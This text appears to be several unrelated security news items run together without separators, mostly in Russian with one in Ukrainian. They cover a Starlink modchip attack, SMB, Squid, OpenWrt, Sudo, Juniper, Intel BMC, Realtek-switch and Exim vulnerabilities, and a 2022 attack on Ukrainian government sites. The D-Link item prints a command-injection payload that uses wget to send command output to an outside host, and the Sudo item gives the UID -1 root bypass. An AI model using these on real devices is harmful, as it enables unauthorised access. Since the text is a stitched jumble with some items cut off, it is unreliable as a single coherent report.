Исследователь из Лёвенского католического университета продемонстрировал на конференции Black Hat технику компрометации пользовательского терминала Starlink, используемого для подключения абонентов к спутниковой сети SpaceX. Терминал оснащён собственным 64-разрядном SoC, созданным компанией STMicro специально для SpaceX. Программное окружение основано на Linux.
 
Предложенный метод позволяет выполнить свой код на терминале Starlink, получить root-доступ и доступ в недоступную пользователю через обычные порты внутреннюю сеть, используемую терминалами, например, для обновления прошивок. Опубликованные наработки также могут быть применены для продвинутых экспериментов в области программно определяемых радиосистем (SDR), в силу специфичной структуры терминала Starlink (фазированная антенная решётка, управляемая программно).

Взлом терминала Starlink интересен с точки зрения атаки на хорошо защищённую Linux-систему с качественной реализацией режима безопасной загрузки (Secure Boot). Так как программно систему не удалось скомпрометировать, взлом был осуществлён на аппаратном уровне с применением специального лабораторного оборудования. В конечном счёте, необходимое для взлома оборудование удалось свести к готовой плате-надстройке (modchip), использующей обычный микроконтроллер Raspberry Pi RP2040 (2-ядерный Cortex M0).

Подготовленная modchip-плата подключается к определённым дорожкам основной платы терминала Starlink и вызывает сбой путём изменения напряжения в определённых частях электрической схемы ("voltage fault"). Вызов сбоя в момент проверки цифровой подписи в ROM bootloader (BL1) позволяет запустить на SoC произвольный код, несмотря на отсутствие для этого кода корректной цифровой подписи.

Схема платы для взлома терминалов Starlink опубликована на GitHub в формате KiCad. Также опубликован код использованной для атаки прошивки микроконтроллера. Стоимость изготовления платы оценивается примерно в 25 долларов.
У ніч з 13 на 14 січня хакери здійснили глобальну атаку на сайти Кабінету міністрів та окремих міністерств. Також тимчасово недоступний сайт держпослуг "Дія".

Джерело: урядові сайти, Facebook-сторінка Міносвіти

Деталі: У Міносвіти повідомили, що у зв’язку з глобальною атакою у ніч з 13 на 14 січня 2022 року офіційний сайт міністерства тимчасово не працює.

У відомстві закликали користуватися іншими вебресурсами, зокрема офіційними сторінками міністерств у соцмережах.

Повідомляється, що наразі тривають роботи з усунення несправності, а також працює кіберполіція.
Уязвимость затрагивает версии Windows 10 1903 и 1909.

Исследователи кибербезопасности из компании ZecOps обнаружили новую критическую уязвимость ( CVE-2020-1206 ) в сетевом протоколе передачи данных Microsoft Server Message Block (SMB). Ее эксплуатация позволяет злоумышленникам удаленно получить из памяти ядра конфиденциальные данные, а в сочетании с ранее обнаруженной «червеобразной» уязвимостью SMBGhost в Windows 10 ( CVE-2020-0796 ) проблема может быть использована для удаленного выполнения кода.

Проблема, получившая название SMBleed, затрагивает версии Windows 10 1903 и 1909. По словам экспертов, она связана с тем, что функция распаковки («Srv2DecompressData») в SMB-протоколе способна обрабатывать специально сформированные запросы сообщений (например, SMB2 WRITE), отправленные на целевой сервер SMBv3. Таким образом злоумышленник может читать данные в памяти ядра и вносить изменения в функцию сжатия.
Атака Spectra базируется на механизме, используемом чипами для переключения между беспроводными технологиями.

Группа немецких и итальянских ученых разработали новую атаку, позволяющую обойти разделение между технологиями Wi-Fi и Bluetooth, используемыми на одном устройстве (смартфоне, ноутбуках и планшетах). Атака, получившая название Spectra, работает на «комбинированных» чипах, обрабатывающих различные виды беспроводной связи, в том числе Wi-Fi, Bluetooth, LTE и пр.

«Новый класс уязвимостей Spectra базируется на том факте, что передача данных происходит в одном спектре, и беспроводные чипы должны разрешать доступ к каналу», - сообщили исследователи в коротком анонсе своего будущего доклада на конференции Black Hat.

Если говорить точнее, Spectra базируется на механизме сосуществования, используемом «комбинированными» чипами для быстрого переключения между беспроводными технологиями. По словам исследователей, хотя эти механизмы повышают производительность, они также делают устройство уязвимым к атакам по сторонним каналам.
Эксплуатация проблем позволяет вводить команды в httpd.log, получать права доступа или токены сеансов J-Web.

Производитель телекоммуникационного оборудования для интернет-провайдеров, корпораций и государственного сектора Juniper Networks выпустил внеплановое обновление безопасности для операционной системы Junos OS, исправляющее несколько проблем в web-сервисах и интерфейсе J-Web, объединенных под одним идентификатором CVE (CVE-2020-1631). Эксплуатация проблем позволяет злоумышленнику вводить команды в httpd.log, читать файлы с разрешением на чтение «world» или получать токены сеансов J-Web.

Как сообщила компания, наиболее опасной является проблема, связаннная с токеном сеанса J-Web, получившая оценку в 8,8 балла по шкале CVSS. Если J-Web включен на устройстве, злоумышленник может получить тот же уровень доступа, что и любой авторизованный пользователь (например, права администратора).

Другая проблема затрагивает версии Junos OS 19.3R1 и старше, ее эксплуатация позволяет неавторизованному злоумышленнику прочитать файл конфигурации.

Эксплуатация третьей проблемы позволяет злоумышленнику вводить команды в httpd.log. Однако влияние данной проблемы более ограничено, поскольку служба HTTP имеет права как у пользователя «nobody».

Уязвимость не затрагивает устройства под управлением Junos OS с отключенными сервисами HTTP/HTTPS, но содержится в следующих версиях ОС: 12.3, 12.3X48, 14.1X53, 15.1, 15.1X49, 17.2, 17.3, 17.4, 18.1, 18.2, 18.3, 18.4, 19.1, 19.2, 19.3, 19.4, и 20.1. Сетевым администраторам рекомендуется обновить уязвимые устройства до последних версий программного обеспечения.
Раскрыты сведения об уязвимостях в прокси-сервере Squid, которые без лишней огласки были устранены ещё в прошлом году в выпуске Squid 4.8. Проблемы присутствуют в коде обработки блока "@" в начале URL ("user@host") и позволяют обойти правила ограничения доступа, отравить содержимое кэша и совершать атаку с использованием межсайтового скриптинга.

CVE-2019-12524 - клиент при помощи специально оформленного URL может обойти правила, заданные при помощи директивы url_regex, и получить конфиденциальные сведения о прокси и обрабатываемом трафике (получить доступ к интерфейсу Cache Manager).

CVE-2019-12520 - через манипуляцию с данными об имени пользователя в URL можно добиться сохранения в кэше фиктивного содержимого для определённой страницы, что например, может использоваться для организации выполнения своего JavaScript-кода в контексте других сайтов.
Уязвимость CVE-2020-7982 существует в менеджере пакетов OPKG в OpenWrt.

Специалист компании ForAllSecure Гвидо Вранкен (Guido Vranken) опубликовал подробности о ранее обнаруженной им критической уязвимости в OpenWrt.

Уязвимость CVE-2020-7982 существует в менеджере пакетов OPKG в OpenWrt из-за механизма проверки целостности загруженных пакетов с помощью контрольных сумм SHA-256, встроенных в индекс репозитория.

В процессе выполнения команды opkg install на системе жертвы злоумышленник может осуществить атаку «человек посередине». Атакующий может перехватывать передаваемые данные с целью удаленного выполнения произвольного кода, обманом заставив систему установить вредоносный пакет или вредоносное обновление ПО без соответствующей проверки.
Компания Intel исправила 13 уязвимостей в прошивке своих контроллеров управления материнской платой (BMC), используемых в продуктах Intel Server. 12 из них были выявлены специалистами Intel во время внутренних тестирований. Еще одну (CVE-2019-11171) обнаружил исследователь безопасности Даниэль Медина Веласкес (Daniel Medina Velazquez).

На данный момент об уязвимостях известно очень мало. Как сообщает производитель, CVE-2019-11171, описанная как «уязвимость повреждения» кучи, является очень опасной (9 из 10 баллов по шкале оценивания опасности уязвимостей) и позволяет неавторизованному злоумышленнику раскрыть информацию, повысить свои привилегии и/или вызвать отказ в обслуживании.

В общей сложности 13 уязвимостей затрагивают десятки моделей в каждой линейке Server Board, Compute Module и Server System. Во избежание их эксплуатации злоумышленниками настоятельно рекомендуется обновить прошивку BMC-контроллеров до версии 2.18 или более поздних.
В утилите Sudo, используемой для организации выполнения команд от имени других пользователей, выявлена уязвимость (CVE-2019-14287), которая позволяет добиться выполнения команд с правами root, при наличии в настройках sudoers правил, в которых в секции проверки идентификатора пользователя после разрешающего ключевого слова "ALL" следует явный запрет запуска с правами root ("... (ALL, !root) ..."). В конфигурациях по умолчанию в дистрибутивах уязвимость не проявляется.

При наличии в sudoers допустимых, но крайне редко встречающихся на практике правил, разрешающих выполнение определённой команды под UID-идентификатором любого пользователя, кроме root, атакующий, имеющий полномочия выполнения данной команды, может обойти установленное ограничение и выполнить команду с правами root. Для обхода ограничения достаточно попытаться выполнить указанною в настройках команду с UID "-1" или "4294967295", что приведёт к её выполнению с UID 0.
В беспроводных маршрутизаторах D-Link выявлена опасная уязвимость (CVE-2019–16920), позволяющая удалённо выполнить код на стороне устройства через отправку специального запроса к обработчику "ping_test", доступному без прохождения аутентификации.

Интересно, что по задумке разработчиков прошивки вызов "ping_test" должен выполняться только после аутентификации, но на деле он вызывается в любом случае, независимо от входа в web-интерфейс. В частности, при обращении к скрипту apply_sec.cgi с передачей параметра "action=ping_test", скрипт перебрасывает на страницу аутентификации, но при этом выполняет связанное с ping_test действие. Для выполнения кода использована ещё одна уязвимость в самом ping_test, который вызывает утилиту ping без должной проверки корректности переданного для тестирования IP-адреса. Например, для вызова утилиты wget и передачи на внешний хост результатов выполнения команды "echo 1234" достаточно указать параметр
 
ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://test.test/?$(echo 1234)
В коммутаторах на базе чипов RTL83xx, включая Cisco Small Business 220, Zyxel GS1900-24, NETGEAR GS75x, ALLNET ALL-SG8208M и ещё более десятка устройств от менее известных производителей, выявлены критические уязвимости, позволяющие неаутентифицированному атакующему получить контроль над коммутатором. Проблемы вызваны ошибками в SDK Realtek Managed Switch Controller, код из которого использовался при подготовке прошивок.

Первая уязвимость (CVE-2019-1913) затрагивает управляющий web-интерфейс и даёт возможность выполнить свой код с привилегиями пользователя root. Уязвимость вызвана недостаточной проверкой передаваемых пользователем параметров и отсутствием должной оценки границ буфера при чтении входных данных. В результате, атакующий может вызвать переполнение буфера через отправку специально оформленного запроса и эксплуатировать проблему для выполнения своего кода.

Вторая уязвимость (CVE-2019-1912) позволяет без аутентификации загрузить произвольные файлы на коммутатор, в том числе перезаписать файлы с конфигурацией и организовать запуск обратного shell для удалённого входа. Проблема вызвана неполной проверкой полномочий в web-интерфейсе.

Также можно отметить устранение менее опасной уязвимости (CVE-2019-1914), которая позволяет при наличии непривилегированного аутентифицированного входа в web-интерфейс выполнить произвольные команды с привилегиями root. Проблемы устранены в обновлениях прошивок Cisco Small Business 220 (1.1.4.4), Zyxel и NETGEAR. Детальное описание методов эксплуатации планируется опубликовать 20 августа.

Проблемы также проявляются в других устройствах на чипах RTL83xx, но они пока не подтверждены производителями и не исправлены:
  • EnGenius EGS2110P, EWS1200-28TFP, EWS1200-28TFP;
  • PLANET GS-4210-8P2S, GS-4210-24T2;
  • DrayTek VigorSwitch P1100;
  • CERIO CS-2424G-24P;
  • Xhome DownLoop-G24M;
  • Abaniact (INABA) AML2-PS16-17GP L2;
  • Araknis Networks (SnapAV) AN-310-SW-16-POE;
  • EDIMAX GS-5424PLC, GS-5424PLC;
  • Open Mesh OMS24;
  • Pakedgedevice SX-8P;
  • TG-NET P3026M-24POE.
В агенте пересылки почты Exim обнаружена уязвимость, позволяющая удаленно запускать команды на сервере.

Исследователи компании Qualys обнаружили критическую уязвимость, затрагивающую более половины почтовых серверов. Проблема была обнаружена в агенте пересылки почты (MTA) Exim – ПО, устанавливаемом на почтовых серверах для доставки электронных писем от отправителя к адресату.

По данным за июнь 2019 года, Exim установлено на 57% (507 389) от всех видимых через интернет серверов. Правда, есть сведения, что на самом деле число установок Exim превышает это число в десять раз и составляет 5,4 млн.
В коде обработчика протокола RDS на базе TCP (Reliable Datagram Socket, net/rds/tcp.c) выявлена уязвимость (CVE-2019-11815), которая может привести к обращению к уже освобождённой области памяти и отказу в обслуживании (потенциально не исключается возможность эксплуатации проблемы для организации выполнения кода). Проблема вызывается состоянием гонки (race condition), которое может возникнуть при выполнении функции rds_tcp_kill_sock в момент очистки сокетов для пространства сетевых имён.

В спецификации NVD проблема помечена как удалённо эксплуатируемая по сети, но судя по описанию исправления, без локального присутствия в системе и манипуляции с пространствами имён удалённо организовать атаку не получится. В частности, по мнению разработчиков SUSE уязвимость эксплуатируется только локально, организация атаки достаточно сложна и требует наличия дополнительных привилегий в системе. Если в NVD уровень опасности оценен в 9.3 (CVSS v2) и 8.1 (CVSS v2) баллов, то по рейтингу SUSE опасность оценена в 6.4 балла из 10.

Представители Ubuntu также оценили опасность проблемы как умеренную. При этом в соответствии со спецификацией CVSS v3.0 проблеме присвоен высокий уровень сложности атаки и возможность эксплуатации выставлена всего в 2.2 балла из 10.

Судя по отчёту от компании Cisco уязвимость эксплуатируется удалённо через отправку TCP-пакетов на рабочие сетевые сервисы RDS и уже имеется прототип эксплоита. Насколько эта информация соответствует действительности пока не ясно, возможно в отчёте лишь художественно оформлены предположения NVD. По сведениям VulDB эксплоит ещё не создан и проблема эксплуатируется только локально.

Проблема проявляется в ядрах до 5.0.8 и блокирована мартовским исправлением, включённым в состав ядра 5.0.8. В большинстве дистрибутивов проблема остаётся неустранённой (Debian, RHEL, Ubuntu, SUSE). Исправление выпущено для SLE12 SP3, openSUSE 42.3 и Fedora.
Компания Juniper Networks исправила уязвимость (CVE-2019-0034) в своих сетевых коммутаторах для дата-центров. Проблема заключалась в наличии вшитых учетных данных в программном инструменте Junos Network Agent, предназначенном для управления датчиками и другими устройствами для мониторинга производительности сетей. Если говорить точнее, вшитые учетные данные были обнаружены в компоненте Google gRPC, используемом с Junos Telemetry Interface.

«В используемых gRPC конфигурационных файлах были обнаружены неизменяемые учетные данные, которые могли использоваться Junos Network Agent для неавторизованного чтения некоторых некритических данных (информации с датчиков). Кроме того, API, доступные через Juniper Extension Toolkit (JET), могут выполнять на устройстве некритические операции 'set'», – говорится в уведомлении Juniper Networks.

Хотя уязвимые компоненты могут входить в Junos, вшитые учетные данные есть только в сетевых коммутаторах, на которых работает Telemetry Interface с Junos Network Agent. Устройства без Junos Network Agent уязвимости не подвержены.

Администраторы могут проверить Network Agent на наличие уязвимости, введя команду user@junos> show version | grep na\ telemetry и проверив выходные данные user@junos>JUNOS na telemetry [17.3R3-S3.3]. В случае обнаружения проблемы настоятельно рекомендуется установить последнюю версию прошивки. Впрочем, установка обновлений желательна в любом случае.
Специалисты команды IBM Security предупредили о наличии опасной уязвимости в бюджетных моделях маршрутизаторов TP-Link, с помощью которой злоумышленники могут удаленно перехватить управление устройством. Речь идет о моделях TP-Link WR940N и TL-WR941ND с версией прошивки 150312. Хотя производитель уже прекратил производство данных моделей, они все еще предлагаются в некоторых магазинах электроники.

Проблема связана с web-панелью управления, используемой для настройки маршрутизаторов, в частности, с вкладкой системные инструменты/диагностика, где пользователи могут отправить эхо-запрос по протоколу ICMP на имя или IP-адрес целевого узла. Протокол управляющих сообщений ICMP (Internet Control Message Protocol) используется для обмена служебной и диагностической информацией в сети. Команда ping позволяет выполнить отправку управляющего сообщения типа Echo Request адресуемому узлу и интерпретировать полученный от него ответ в удобном для анализа виде.